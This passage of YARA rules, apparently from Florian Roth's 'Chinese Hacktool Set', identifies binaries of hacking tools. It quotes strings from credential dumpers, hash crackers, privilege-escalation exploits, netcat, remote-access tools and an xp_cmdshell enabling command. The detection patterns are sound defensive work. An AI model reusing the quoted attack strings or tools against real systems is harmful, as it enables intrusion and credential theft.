"Chinese Hacktool Set - file sekurlsa.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5" strings: $s1 = "Bienvenue dans un processus distant" fullword wide $s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide $s3 = "SECURITY\\Policy\\Secrets" fullword wide $s4 = "Injection de donn" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1150KB and all of them } rule mysqlfast { meta: description = "Chinese Hacktool Set - file mysqlfast.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "32b60350390fe7024af7b4b8fbf50f13306c546f" strings: $s2 = "Invalid password hash: %s" fullword ascii $s3 = "-= MySql Hash Cracker =- " fullword ascii $s4 = "Usage: %s hash" fullword ascii $s5 = "Hash: %08lx%08lx" fullword ascii $s6 = "Found pass: " fullword ascii $s7 = "Pass not found" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 900KB and 4 of them } rule DTools2_02_DTools { meta: description = "Chinese Hacktool Set - file DTools.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12" strings: $s0 = "kernel32.dll" ascii $s1 = "TSETPASSWORDFORM" fullword wide $s2 = "TGETNTUSERNAMEFORM" fullword wide $s3 = "TPORTFORM" fullword wide $s4 = "ShellFold" fullword ascii $s5 = "DefaultPHotLigh" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule dll_PacketX { meta: description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" score = 50 hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71" strings: $s9 = "[Failed to load winpcap packet.dll." wide $s10 = "PacketX Version" wide condition: uint16(0) == 0x5a4d and filesize < 1920KB and all of them } rule SqlDbx_zhs { meta: description = "Chinese Hacktool Set - file SqlDbx_zhs.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e34228345498a48d7f529dbdffcd919da2dea414" strings: $s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii $s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii $s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii $s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii $s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii $s12 = "mailto:support@sqldbx.com" fullword ascii $s15 = "S.last_login_time \"Last Login\", " fullword ascii condition: uint16(0) == 0x5a4d and 4 of them } rule ms10048_x86 { meta: description = "Chinese Hacktool Set - file ms10048-x86.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e57b453966e4827e2effa4e153f2923e7d058702" strings: $s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii $s2 = "The target is most likely patched." fullword ascii $s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii $s4 = "[ ] Creating evil window" fullword ascii $s5 = "%sHANDLEF_INDESTROY" fullword ascii $s6 = "[+] Set to %d exploit half succeeded" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 4 of them } rule Dos_ch { meta: description = "Chinese Hacktool Set - file ch.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7" strings: $s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii $s4 = "fuck,can't find WMI process PID." fullword ascii $s5 = "/Churraskito/-->Found token %s " fullword ascii $s8 = "wmiprvse.exe" fullword ascii $s10 = "SELECT * FROM IIsWebInfo" fullword ascii $s17 = "WinSta0\\Default" fullword ascii /* Goodware String - occured 22 times */ condition: uint16(0) == 0x5a4d and filesize < 260KB and 3 of them } rule DUBrute_DUBrute { meta: description = "Chinese Hacktool Set - file DUBrute.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65" strings: $s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii $s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii $s3 = "Create %d IP@Loginl;Password" fullword ascii $s4 = "UBrute.com" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1020KB and all of them } rule CookieTools { meta: description = "Chinese Hacktool Set - file CookieTools.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be" strings: $s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii $s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide $s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide $s8 = "OnGetPasswordP" fullword ascii $s12 = "http://www.chinesehack.org/" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and 2 of them } rule update_PcInit { meta: description = "Chinese Hacktool Set - file PcInit.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344" strings: $s1 = "\\svchost.exe" fullword ascii $s2 = "%s%08x.001" fullword ascii $s3 = "Global\\ps%08x" fullword ascii $s4 = "drivers\\" fullword ascii /* Goodware String - occured 2 times */ $s5 = "StrStrA" fullword ascii /* Goodware String - occured 43 times */ $s6 = "StrToIntA" fullword ascii /* Goodware String - occured 44 times */ condition: uint16(0) == 0x5a4d and filesize < 50KB and all of them } rule dat_NaslLib { meta: description = "Chinese Hacktool Set - file NaslLib.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "fb0d4263118faaeed2d68e12fab24c59953e862d" strings: $s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii $s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii $s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1360KB and all of them } rule Dos_1 { meta: description = "Chinese Hacktool Set - file 1.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b554f0687a12ec3a137f321cc15e052ff219f28c" strings: $s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii $s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule OtherTools_servu { meta: description = "Chinese Hacktool Set - file svu.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5c64e6879a9746a0d65226706e0edc7a" strings: $s0 = "MZKERNEL32.DLL" fullword ascii $s1 = "UpackByDwing@" fullword ascii $s2 = "GetProcAddress" fullword ascii $s3 = "WriteFile" fullword ascii condition: $s0 at 0 and filesize < 50KB and all of them } rule ustrrefadd { meta: description = "Chinese Hacktool Set - file ustrrefadd.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b371b122460951e74094f3db3016264c9c8a0cfa" strings: $s0 = "E-Mail : admin@luocong.com" fullword ascii $s1 = "Homepage: http://www.luocong.com" fullword ascii $s2 = ": %d - " fullword ascii $s3 = "ustrreffix.dll" fullword ascii $s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 320KB and all of them } rule XScanLib { meta: description = "Chinese Hacktool Set - file XScanLib.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0" strings: $s4 = "XScanLib.dll" fullword ascii $s6 = "Ports/%s/%d" fullword ascii $s8 = "DEFAULT-TCP-PORT" fullword ascii $s9 = "PlugCheckTcpPort" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 360KB and all of them } rule IDTools_For_WinXP_IdtTool { meta: description = "Chinese Hacktool Set - file IdtTool.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6" strings: $s2 = "IdtTool.sys" fullword ascii $s4 = "Idt Tool bY tMd[CsP]" fullword wide $s6 = "\\\\.\\slIdtTool" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 25KB and all of them } rule GoodToolset_ms11046 { meta: description = "Chinese Hacktool Set - file ms11046.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409" strings: $s1 = "[*] Token system command" fullword ascii $s2 = "[*] command add user 90sec 90sec" fullword ascii $s3 = "[*] Add to Administrators success" fullword ascii $s4 = "[*] User has been successfully added" fullword ascii $s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii /* Goodware String - occured 3 times */ condition: uint16(0) == 0x5a4d and filesize < 840KB and 2 of them } rule Cmdshell32 { meta: description = "Chinese Hacktool Set - file Cmdshell32.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "3c41116d20e06dcb179e7346901c1c11cd81c596" strings: $s1 = "cmdshell.exe" fullword wide $s2 = "cmdshell" fullword ascii $s3 = "[Root@CmdShell ~]#" fullword wide condition: uint16(0) == 0x5a4d and filesize < 62KB and all of them } rule Sniffer_analyzer_SSClone_1210_full_version { meta: description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e" strings: $s0 = "http://www.vip80000.com/hot/index.html" fullword ascii $s1 = "GetConnectString" fullword ascii $s2 = "CnCerT.Safe.SSClone.dll" fullword ascii $s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3580KB and all of them } rule x64_klock { meta: description = "Chinese Hacktool Set - file klock.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc" strings: $s1 = "Bienvenue dans un processus distant" fullword wide $s2 = "klock.dll" fullword ascii $s3 = "Erreur : le bureau courant (" fullword wide $s4 = "klock de mimikatz pour Windows" fullword wide condition: uint16(0) == 0x5a4d and filesize < 907KB and all of them } rule Dos_Down32 { meta: description = "Chinese Hacktool Set - file Down32.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "0365738acd728021b0ea2967c867f1014fd7dd75" strings: $s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide $s6 = "down.exe" fullword wide $s15 = "get_Form1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 137KB and all of them } rule MarathonTool_2 { meta: description = "Chinese Hacktool Set - file MarathonTool.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c" strings: $s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide $s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide $s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule Tools_termsrv { meta: description = "Chinese Hacktool Set - file termsrv.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "294a693d252f8f4c85ad92ee8c618cebd94ef247" strings: $s1 = "Iv\\SmSsWinStationApiPort" fullword ascii $s2 = " TSInternetUser " fullword wide $s3 = "KvInterlockedCompareExchange" fullword ascii $s4 = " WINS/DNS " fullword wide $s5 = "winerror=%1" fullword wide $s6 = "TermService " fullword wide condition: uint16(0) == 0x5a4d and filesize < 1150KB and all of them } rule scanms_scanms { meta: description = "Chinese Hacktool Set - file scanms.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a" strings: $s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii $s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii $s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii /* PEStudio Blacklist: os */ $s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii $s5 = "Internet Explorer 1.0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and 3 of them } rule CN_Tools_PcShare { meta: description = "Chinese Hacktool Set - file PcShare.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ee7ba9784fae413d644cdf5a093bd93b73537652" strings: $s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide $s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide $s5 = "port=%s;name=%s;pass=%s;" fullword wide $s16 = "%s\\ini\\*.dat" fullword wide $s17 = "pcinit.exe" fullword wide $s18 = "http://www.pcshare.cn" fullword wide condition: uint16(0) == 0x5a4d and filesize < 6000KB and 3 of them } rule pw_inspector { meta: description = "Chinese Hacktool Set - file pw-inspector.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215" strings: $s1 = "-m MINLEN minimum length of a valid password" fullword ascii $s2 = "http://www.thc.org" fullword ascii $s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii condition: uint16(0) == 0x5a4d and filesize < 460KB and all of them } rule Dll_LoadEx { meta: description = "Chinese Hacktool Set - file Dll_LoadEx.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150" strings: $s0 = "WiNrOOt@126.com" fullword wide $s1 = "Dll_LoadEx.EXE" fullword wide $s3 = "You Already Loaded This DLL ! :(" fullword ascii $s10 = "Dll_LoadEx Microsoft " fullword wide $s17 = "Can't Load This Dll ! :(" fullword ascii $s18 = "WiNrOOt" fullword wide $s20 = " Dll_LoadEx(&A)..." fullword wide condition: uint16(0) == 0x5a4d and filesize < 120KB and 3 of them } rule dat_report { meta: description = "Chinese Hacktool Set - file report.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2" strings: $s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii $s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 480KB and all of them } rule Dos_iis7 { meta: description = "Chinese Hacktool Set - file iis7.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978" strings: $s0 = "\\\\localhost" fullword ascii $s1 = "iis.run" fullword ascii $s3 = ">Could not connecto %s" fullword ascii $s5 = "WHOAMI" ascii $s13 = "WinSta0\\Default" fullword ascii /* Goodware String - occured 22 times */ condition: uint16(0) == 0x5a4d and filesize < 140KB and all of them } rule SwitchSniffer { meta: description = "Chinese Hacktool Set - file SwitchSniffer.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd" strings: $s0 = "NextSecurity.NET" fullword wide $s2 = "SwitchSniffer Setup" fullword wide condition: uint16(0) == 0x5a4d and all of them } rule dbexpora { meta: description = "Chinese Hacktool Set - file dbexpora.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b55b007ef091b2f33f7042814614564625a8c79f" strings: $s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii $s12 = "OCI 8 - OCIDescriptorFree" fullword ascii $s13 = "ORACommand *" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 835KB and all of them } rule SQLCracker { meta: description = "Chinese Hacktool Set - file SQLCracker.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410" strings: $s0 = "msvbvm60.dll" fullword ascii /* reversed goodware string 'lld.06mvbvsm' */ $s1 = "_CIcos" fullword ascii $s2 = "kernel32.dll" fullword ascii $s3 = "cKmhV" fullword ascii $s4 = "080404B0" fullword wide condition: uint16(0) == 0x5a4d and filesize < 125KB and all of them } rule FreeVersion_debug { meta: description = "Chinese Hacktool Set - file debug.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d11e6c6f675b3be86e37e50184dadf0081506a89" strings: $s0 = "c:\\Documents and Settings\\Administrator\\" fullword ascii $s1 = "Got WMI process Pid: %d" ascii $s2 = "This exploit will execute" ascii $s6 = "Found token %s " ascii $s7 = "Running reverse shell" ascii $s10 = "wmiprvse.exe" fullword ascii $s12 = "SELECT * FROM IIsWebInfo" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 820KB and 3 of them } rule Dos_look { meta: description = "Chinese Hacktool Set - file look.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e1a37f31170e812185cf00a838835ee59b8f64ba" strings: $s1 = "<description>CHKen QQ:41901298</description>" fullword ascii $s2 = "version=\"9.9.9.9\"" fullword ascii $s3 = "name=\"CH.Ken.Tool\"" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 40KB and all of them } rule NtGodMode { meta: description = "Chinese Hacktool Set - file NtGodMode.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "8baac735e37523d28fdb6e736d03c67274f7db77" strings: $s0 = "to HOST!" fullword ascii $s1 = "SS.EXE" fullword ascii $s5 = "lstrlen0" fullword ascii $s6 = "Virtual" fullword ascii /* Goodware String - occured 6 times */ $s19 = "RtlUnw" fullword ascii /* Goodware String - occured 1 times */ condition: uint16(0) == 0x5a4d and filesize < 45KB and all of them } rule Dos_NC { meta: description = "Chinese Hacktool Set - file NC.EXE" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "57f0839433234285cc9df96198a6ca58248a4707" strings: $s1 = "nc -l -p port [options] [hostname] [port]" fullword ascii $s2 = "invalid connection to [%s] from %s [%s] %d" fullword ascii $s3 = "post-rcv getsockname failed" fullword ascii $s4 = "Failed to execute shell, error = %s" fullword ascii $s5 = "UDP listen needs -p arg" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 290KB and all of them } rule WebCrack4_RouterPasswordCracking { meta: description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638" strings: $s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii $s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii $s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii $s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii $s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide condition: uint16(0) == 0x5a4d and filesize < 5000KB and 2 of them } rule HScan_v1_20_oncrpc { meta: description = "Chinese Hacktool Set - file oncrpc.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e8f047eed8d4f6d2f5dbaffdd0e6e4a09c5298a2" strings: $s1 = "clnt_raw.c - Fatal header serialization error." fullword ascii $s2 = "svctcp_.c - cannot getsockname or listen" fullword ascii $s3 = "too many connections (%d), compilation constant FD_SETSIZE was only %d" fullword ascii $s4 = "svc_run: - select failed" fullword ascii $s5 = "@(#)bindresvport.c" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 340KB and 4 of them } rule hscan_gui { meta: description = "Chinese Hacktool Set - file hscan-gui.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1885f0b7be87f51c304b39bc04b9423539825c69" strings: $s0 = "Hscan.EXE" fullword wide $s1 = "RestTool.EXE" fullword ascii $s3 = "Hscan Application " fullword wide condition: uint16(0) == 0x5a4d and filesize < 550KB and all of them } rule S_MultiFunction_Scanners_s { meta: description = "Chinese Hacktool Set - file s.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355" strings: $s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii $s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii $s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii $s3 = "explorer.exe http://www.hackdos.com" fullword ascii $s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii $s5 = "Failed to read file or invalid data in file!" fullword ascii $s6 = "www.hackdos.com" fullword ascii $s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii $s11 = "The interface of kernel library is invalid!" fullword ascii $s12 = "eventvwr" fullword ascii $s13 = "Failed to decompress data!" fullword ascii $s14 = "NOTEPAD.EXE result.txt" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 8000KB and 4 of them } rule Dos_GetPass { meta: description = "Chinese Hacktool Set - file GetPass.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d18d952b24110b83abd17e042f9deee679de6a1a" strings: $s0 = "GetLogonS" ascii $s3 = "/showthread.php?t=156643" ascii $s8 = "To Run As Administ" ascii $s18 = "EnableDebugPrivileg" fullword ascii $s19 = "sedebugnameValue" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 890KB and all of them } rule update_PcMain { meta: description = "Chinese Hacktool Set - file PcMain.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa" strings: $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii $s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii $s3 = "\\svchost.exe -k " fullword ascii $s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii $s9 = "Global\\%s-key-event" fullword ascii $s10 = "%d%d.exe" fullword ascii $s14 = "%d.exe" fullword ascii $s15 = "Global\\%s-key-metux" fullword ascii $s18 = "GET / HTTP/1.1" fullword ascii $s19 = "\\Services\\" fullword ascii $s20 = "qy001id=%d;qy001guid=%s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and 4 of them } rule Dos_sys { meta: description = "Chinese Hacktool Set - file sys.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b5837047443f8bc62284a0045982aaae8bab6f18" strings: $s0 = "'SeDebugPrivilegeOpen " fullword ascii $s6 = "Author: Cyg07*2" fullword ascii $s12 = "from golds7n[LAG]'J" fullword ascii $s14 = "DAMAGE" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule dat_xpf { meta: description = "Chinese Hacktool Set - file xpf.sys" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "761125ab594f8dc996da4ce8ce50deba49c81846" strings: $s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii $s2 = "\\Device\\XScanPF" fullword wide $s3 = "\\DosDevices\\XScanPF" fullword wide condition: uint16(0) == 0x5a4d and filesize < 25KB and all of them } rule Project1 { meta: description = "Chinese Hacktool Set - file Project1.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96" strings: $s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii $s2 = "Password.txt" fullword ascii $s3 = "LoginPrompt" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule Arp_EMP_v1_0 { meta: description = "Chinese Hacktool Set - file Arp EMP v1.0.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee" strings: $s0 = "Arp EMP v1.0.exe" fullword wide condition: uint16(0) == 0x5a4d and filesize < 800KB and all of them } rule CN_Tools_MyUPnP { meta: description = "Chinese Hacktool Set - file MyUPnP.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "15b6fca7e42cd2800ba82c739552e7ffee967000" strings: $s1 = "<description>BYTELINKER.COM</description>" fullword ascii $s2 = "myupnp.exe" fullword ascii $s3 = "LOADER ERROR" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1500KB and all of them } rule CN_Tools_Shiell { meta: description = "Chinese Hacktool Set - file Shiell.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b432d80c37abe354d344b949c8730929d8f9817a" strings: $s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii $s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide $s3 = "Shift shell.exe" fullword wide $s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1500KB and 2 of them } rule cndcom_cndcom { meta: description = "Chinese Hacktool Set - file cndcom.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "08bbe6312342b28b43201125bd8c518531de8082" strings: $s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii $s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii $s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii $s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii $s5 = "Windows NT SP6 (Chinese)" fullword ascii $s6 = "- Original code by FlashSky and Benjurry" fullword ascii $s7 = "\\C$\\123456111111111111111.doc" fullword wide $s8 = "shell3all.c" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 2 of them } rule IsDebug_V1_4 { meta: description = "Chinese Hacktool Set - file IsDebug V1.4.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ca32474c358b4402421ece1cb31714fbb088b69a" strings: $s0 = "IsDebug.dll" fullword ascii $s1 = "SV Dumper V1.0" fullword wide $s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii $s8 = "Error WriteMemory failed" fullword ascii $s9 = "IsDebugPresent" fullword ascii $s10 = "idb_Autoload" fullword ascii $s11 = "Bin Files" fullword ascii $s12 = "MASM32 version" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 30KB and all of them } rule HTTPSCANNER { meta: description = "Chinese Hacktool Set - file HTTPSCANNER.EXE" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a" strings: $s1 = "HttpScanner.exe" fullword wide $s2 = "HttpScanner" fullword wide condition: uint16(0) == 0x5a4d and filesize < 3500KB and all of them } rule HScan_v1_20_PipeCmd { meta: description = "Chinese Hacktool Set - file PipeCmd.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "64403ce63b28b544646a30da3be2f395788542d6" strings: $s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii $s2 = "PipeCmd.exe" fullword wide $s3 = "Please Use NTCmd.exe Run This Program." fullword ascii $s4 = "%s\\pipe\\%s%s%d" fullword ascii $s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii $s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii $s7 = "This is a service executable! Couldn't start directly." fullword ascii $s8 = "Connecting to Remote Server ...Failed" fullword ascii $s9 = "PIPECMDSRV" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and 4 of them } rule Dos_fp { meta: description = "Chinese Hacktool Set - file fp.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c" strings: $s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii $s2 = "FPipe.exe" fullword wide $s3 = "http://www.foundstone.com" fullword ascii $s4 = "%s %s port %d. Address is already in use" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 65KB and all of them } rule Dos_netstat { meta: description = "Chinese Hacktool Set - file netstat.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d0444b7bd936b5fc490b865a604e97c22d97e598" strings: $s0 = "w03a2409.dll" fullword ascii $s1 = "Retransmission Timeout Algorithm = unknown (%1!u!)" fullword wide /* Goodware String - occured 2 times */ $s2 = "Administrative Status = %1!u!" fullword wide /* Goodware String - occured 2 times */ $s3 = "Packet Too Big %1!-10u! %2!-10u!" fullword wide /* Goodware String - occured 2 times */ condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule CN_Tools_xsniff { meta: description = "Chinese Hacktool Set - file 